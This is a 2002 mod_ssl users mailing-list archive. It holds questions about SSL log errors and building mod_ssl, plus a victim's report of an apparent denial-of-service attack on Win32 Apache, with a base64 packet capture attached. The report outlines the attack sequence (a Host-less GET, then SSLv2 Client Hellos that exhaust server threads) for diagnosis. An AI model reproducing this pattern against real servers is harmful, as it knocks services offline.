Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms080905070506050407040701
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi !

I am getting this error in ssl_log:

[Thu Dec 19 05:45:02 2002] [error] Spurious SSL handshake interrupt 
[Hint: Usually just one of those OpenSSL confusions!?]


And I mean a lot. Is there something wrong ?

Sasa

--------------ms080905070506050407040701
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIEzjCC
AmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xv
dmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0
MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBhci5ob21lbGludXgubmV0MB4XDTAy
MTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQDEwtTYXNhIFNUVVBBUjEoMCYGCSqG
SIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5ldDCBnzANBgkqhkiG9w0BAQEFAAOB
jQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM6O2D4IGrgQK2MfAJXcd+AaMlwyGq
P3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GApPHAoeiBTt7rWbkSYsllVPn3nS1t
indhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEAATANBgkqhkiG9w0BAQQFAAOBgQBz
4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7klV3/+8OMkLA3TK8EvDoLNeFKgbZZ
STSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5EScodGUfOJzPlg1KNqXXaV3Aomyq
3WhJ07a2c9kwXpy/flFLlUmccDCCAmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYD
VQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMT
FHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBh
ci5ob21lbGludXgubmV0MB4XDTAyMTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkG
A1UEBhMCU0kxETAPBgNVBAgTCFNsb3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQD
EwtTYXNhIFNUVVBBUjEoMCYGCSqGSIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5l
dDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM
6O2D4IGrgQK2MfAJXcd+AaMlwyGqP3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GA
pPHAoeiBTt7rWbkSYsllVPn3nS1tindhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEA
ATANBgkqhkiG9w0BAQQFAAOBgQBz4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7k
lV3/+8OMkLA3TK8EvDoLNeFKgbZZSTSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5
EScodGUfOJzPlg1KNqXXaV3Aomyq3WhJ07a2c9kwXpy/flFLlUmccDGCAoAwggJ8AgEBMIGH
MIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3Ix
HTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFz
dGVyQHN0dXBhci5ob21lbGludXgubmV0AgECMAkGBSsOAwIaBQCgggFOMBgGCSqGSIb3DQEJ
AzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMTIxOTA2MTMyOFowIwYJKoZIhvcN
AQkEMRYEFNuae7oCwKP4Xs2osvPBCvQd4Aj0MFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcN
AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMC
AgEoMIGaBgsqhkiG9w0BCRACCzGBiqCBhzCBgTELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMR0wGwYDVQQDExRzdHVwYXIuaG9tZWxpbnV4Lm5l
dDEuMCwGCSqGSIb3DQEJARYfcG9zdG1hc3RlckBzdHVwYXIuaG9tZWxpbnV4Lm5ldAIBAjAN
BgkqhkiG9w0BAQEFAASBgK8VSDe+lXoeaOn8w6V4dNrAbJr1iE/9a+bQLh0dyvd99Qe0y6Er
YseoculEb3X9hNyFdWYdAoib8PUZfcGHnaGhoEVU2zFFALiTmFgrL0myBFMU2Yv82bLsiD4n
ZNqrinB51akfSL4+TsL1USm23VJfETFnd65iAG3SO1tnk+7CAAAAAAAA
--------------ms080905070506050407040701--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 19 10:46:36 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 695182AA086; Thu, 19 Dec 2002 10:46:36 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 0DDF72AA078
	for ; Thu, 19 Dec 2002 10:46:35 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id D9BAE6E40E8; Thu, 19 Dec 2002 10:49:06 +0100 (CET)
Date: Thu, 19 Dec 2002 10:49:06 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: compiling on existing apache 1.3.27 ?
Message-ID: <20021219094906.GA4495@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Dec 19, 2002 at 10:15:05AM +1100, Andrew Nelson wrote:
> Hi,
> 
> I had great trouble upgrading my server to Apache 1.3.27
> with frontpage and PHP...  I've finally done it and now
> I want to add mod_ssl to it...   In the docs, it only
> describes building apache with mod_ssl from scratch - is
> it easy to compile it in now?  I also noticed the directory
> structure is different from the FreeBSD port - apache config
> is in /usr/local/etc/apache and the rest is elsewhere.
> 
It can't be done unless apache was prepared for mod_ssl in the
first place. /path/to/apache/bin/httpd -V should list -DEAPI
if it has. If that is in place, then read the INSTALL file about
upgrading, but without it you have to recompile from scratch.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 19 17:12:17 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6D8DF2AA086; Thu, 19 Dec 2002 17:12:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from communicate.01com.com (communicate.01com.com [209.146.248.130])
	by master.modssl.org (Postfix) with ESMTP id 7242E2AA078
	for ; Thu, 19 Dec 2002 17:12:15 +0100 (CET)
Received: from 01com.com (DEV_STRAKHOV_98 [10.0.0.43]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id Z1P8NZG0; Thu, 19 Dec 2002 10:04:15 -0500
Message-ID: <3E01EDE0.F353F311@01com.com>
Date: Thu, 19 Dec 2002 11:03:44 -0500
From: Sergey Strakhov 
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Cc: Pedro Nascimento ,
	Greg Davydouski 
Subject: DoS attack on mod_ssl 2.8.12 ??
Content-Type: multipart/mixed;
 boundary="------------64192C76DD9A01B614C0BD74"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sergey Strakhov 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.
--------------64192C76DD9A01B614C0BD74
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit

Hello,

We are experiencing problems with our Win32 Apache 1.3.27 with mod_ssl
2.8.12 + openssl 0.9.6g running on Windows 2000.
It is a sort of DoS attack that makes our web site totally inaccessible.

One of those attacks was captured with Ethereal. The dump is attached.

As you can see, the attack is accomplished through both HTTP (80) and
HTTPS (443) ports.
First, the connection is opened to the HTTP port and a malformed
HTTP/1.1 GET request (with no Host: header) is sent to the HTTP port
(probably with an intention to produce a crash described in
http://www.cert.org/advisories/CA-2002-27.html or just to determine the
host's Server version). The server responds with "HTTP/1.1 400 Bad
request" and closes the connection. After that the attacker starts
opening connections to the HTTPS port. One of them is used to send SSLv2
Client Hello request. From this point the web server starts rejecting
all incoming connections and the web site stops responding on both HTTP
and HTTPS ports.

The error log usually contains records like:

[..time..] [error] [client ..] client sent HTTP/1.1 request without
hostname (see RFC2616 section 14.23): /
[..time..] [error] Server ran out of threads to serve requests. Consider
raising the ThreadsPerChild setting

Is this problem related to mod_ssl anyhow?
Do you expect any fix for this problem soon?

Regards

P.S. We have the ThreadsPerChild parameter of httpd.conf set to 10.


--------------64192C76DD9A01B614C0BD74
Content-Type: application/octet-stream;
 name="filtered"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
 filename="filtered"

1MOyoQIABAAAAAAAAAAAAP//AAABAAAATMX+PbflAABKAAAASgAAAAABAsLU61JUAOeqMggA
RQAAPJwcQAAyBp/O2VOG0awQAJzR5wBQ0ZjBNAAAAACgAhawX48AAAIEBYQEAggKAcZeWwAA
AAABAwMATMX+PQDmAABOAAAATgAAAFJUAOeqMgABAsLU6wgARQAAQLg0QACABgAArBAAnNlT
htEAUNHnkT0WD9GYwTWwEvrwIdwAAAIEBbQBAwMAAQEICgAAAAAAAAAAAQEEAkzF/j3nAwEA
SgAAAEoAAAAAgMhNi+ZSVADnqjIIAEUAADwWS0AAMgYln9lThtGsEACd0egAUNDMS2UAAAAA
oAIWsNYoAAACBAWEBAIICgHGXlsAAAAAAQMDAE3F/j0v4QUASgAAAEoAAAAAAQLC1OtSVADn
qjIIAEUAADxF+0AAMgb179lThtGsEACc0kYAUNHXGzcAAAAAoAIWsAR+AAACBAWEBAIICgHG
XswAAAAAAQMDAE3F/j174QUATgAAAE4AAABSVADnqjIAAQLC1OsIAEUAAEC4NUAAgAYAAKwQ
AJzZU4bRAFDSRpFC1jLR1xs4sBL68AcTAAACBAW0AQMDAAEBCAoAAAAAAAAAAAEBBAJNxf49
I5kNAEIAAABCAAAAAAECwtTrUlQA56oyCABFAAA0RfxAADIG9fbZU4bRrBAAnNJGAFDR1xs4
kULWM4AQFrDLRgAAAQEICgHGXxIAAAAATcX+PY25DQBUAAAAVAAAAAABAsLU61JUAOeqMggA
RQAARkX9QAAyBvXj2VOG0awQAJzSRgBQ0dcbOJFC1jOAGBaw7IsAAAEBCAoBxl8SAAAAAEdF
VCAvIEhUVFAvMS4xDQoNCk3F/j2cug0AnwIAAJ8CAABSVADnqjIAAQLC1OsIAEUAApG4NkAA
gAYAAKwQAJzZU4bRAFDSRpFC1jPR1xtKgBj63rXzAAABAQgKACJR/QHGXxJIVFRQLzEuMSA0
MDAgQmFkIFJlcXVlc3QNCkRhdGU6IFR1ZSwgMTcgRGVjIDIwMDIgMDY6MzM6NDkgR01UDQpT
ZXJ2ZXI6IEFwYWNoZS8xLjMuMjcgKFdpbjMyKSBtb2Rfc3NsLzIuOC4xMiBPcGVuU1NMLzAu
OS42ZyBQSFAvNC4yLjAtZGV2DQpDb25uZWN0aW9uOiBjbG9zZQ0KVHJhbnNmZXItRW5jb2Rp
bmc6IGNodW5rZWQNCkNvbnRlbnQtVHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PWlzby04ODU5
LTENCg0KMTY5DQo8IURPQ1RZUEUgSFRNTCBQVUJMSUMgIi0vL0lFVEYvL0RURCBIVE1MIDIu
MC8vRU4iPgo8SFRNTD48SEVBRD4KPFRJVExFPjQwMCBCYWQgUmVxdWVzdDwvVElUTEU+Cjwv
SEVBRD48Qk9EWT4KPEgxPkJhZCBSZXF1ZXN0PC9IMT4KWW91ciBicm93c2VyIHNlbnQgYSBy
ZXF1ZXN0IHRoYXQgdGhpcyBzZXJ2ZXIgY291bGQgbm90IHVuZGVyc3RhbmQuPFA+CmNsaWVu
dCBzZW50IEhUVFAvMS4xIHJlcXVlc3Qgd2l0aG91dCBob3N0bmFtZSAoc2VlIFJGQzI2MTYg
c2VjdGlvbiAxNC4yMyk6IC88UD4KPEhSPgo8QUREUkVTUz5BcGFjaGUvMS4zLjI3IFNlcnZl
ciBhdCBsb2NhbGhvc3QgUG9ydCA4MDwvQUREUkVTUz4KPC9CT0RZPjwvSFRNTD4KDQowDQoN
Ck3F/j0Quw0AQgAAAEIAAABSVADnqjIAAQLC1OsIAEUAADS4N0AAgAYAAKwQAJzZU4bRAFDS
RpFC2JDR1xtKgBH63pKIAAABAQgKACJR/QHGXxJOxf49a2kIAEIAAABCAAAAAAECwtTrUlQA
56oyCABFAAA0Rf5AADIG9fTZU4bRrBAAnNJGAFDR1xtKkULYkIAQGf9zNAAAAQEICgHGX0cA
IlH9TsX+PViHCABKAAAASgAAAAABAsLU61JUAOeqMggARQAAPK8cQAAyBozO2VOG0awQAJzS
TAG70UjwWwAAAACgAhawLfwAAAIEBYQEAggKAcZfRwAAAAABAwMATsX+PZuHCABOAAAATgAA
AFJUAOeqMgABAsLU6wgARQAAQLg4QACABgAArBAAnNlThtEBu9JMkUeY5dFI8FywEvrwblQA
AAIEBbQBAwMAAQEICgAAAAAAAAAAAQEEAk7F/j1P5QgAQgAAAEIAAAAAAQLC1OtSVADnqjII
AEUAADRF/0AAMgb189lThtGsEACc0kYAUNHXG0qRQtiRgBAZ/3MvAAABAQgKAcZfSwAiUf1O
xf49aogMAEIAAABCAAAAAAECwtTrUlQA56oyCABFAAA0rx1AADIGjNXZU4bRrBAAnNJMAbvR
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
